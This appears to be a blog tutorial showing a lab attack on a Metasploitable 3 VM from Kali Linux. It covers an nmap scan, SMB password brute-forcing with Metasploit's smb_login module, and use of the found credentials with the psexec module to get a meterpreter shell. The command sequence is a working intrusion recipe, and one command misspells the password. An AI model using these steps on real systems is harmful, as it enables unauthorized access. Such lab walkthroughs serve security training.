Target: Metasploitable 3
Attacker: Kali Linux
Scan the target IP to know the Open ports for running
services. I am using nmap command for scanning the target PC. NMAP shown all
available open ports and their services today this article will cover SMB login
attack for which it requires open SMB port.
Type the following command on
terminal in kali Linux.
nmap –p- -A 192.168.1.11
In previous article it’s about SSH Login attack read from
here.
Luckily!!! In Metasploit3 port 445 is open for SMB service mainly
used for providing shared access to files, printers,
and serial ports and
miscellaneous communications between server and client on a network.
Now it is necessary to create a dictionary file to exploit it. To make
a dictionary file type the following command:
CeWL is a customized wordlist generator that sticks to just the site you have specified
and will go to a depth of 2 links and returns a list of words which can then be
used for password crackers such as John the Ripper.
Start metasploit framework by
typing msfconsole on terminal in kali Linux.
This module will test SMB
logins on a range of machines and report successful logins. If you have loaded
a database plug-in and connected to a database this module will record
successful logins and hosts so you can track your access.
Type following command under msfconsole
use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login)>set rhosts 192.168.1.11
msf auxiliary (smb_login)>set rport 445
msf auxiliary (smb_login)>set smbuser vagrant
msf auxiliary (smb_login)>set pass_file
/root/Desktop/pass.txt
msf auxiliary (smb_login)>set stop_on_success true
msf auxiliary (smb_login)> exploit
This exploit will start brute
force attack to match the valid authentication and give green sign when founds
the correct credential for SMB login.
Our attack is successful and we have got valid login vagrant: vagrant as username and
password.
This module uses a valid
administrator username and password (or password hash) to execute an arbitrary
payload. This module is similar to the "psexec" utility provided by
SysInternals. This module is now able to clean up after itself. The service
created by this tool uses a randomly chosen name and description.
Hence using above credential this exploit will try to
provide the meterperter shell.
Type following command to use this module for attack.
msf> use
exploit/windows/smb/psexec
msf
exploit (psexec)>set rhosts 192.168.1.11
msf
exploit (psexec)>set rport 445
msf
exploit (psexec)>set smbuser vagrant
msf
exploit (psexec)>set smbpass vargrant
msf
exploit (psexec)> exploit
Wonderful!!! Our meterpreter session 1 is opened and you have got
victim shell.
meterpreter> sysinfo
0 comments:
Post a Comment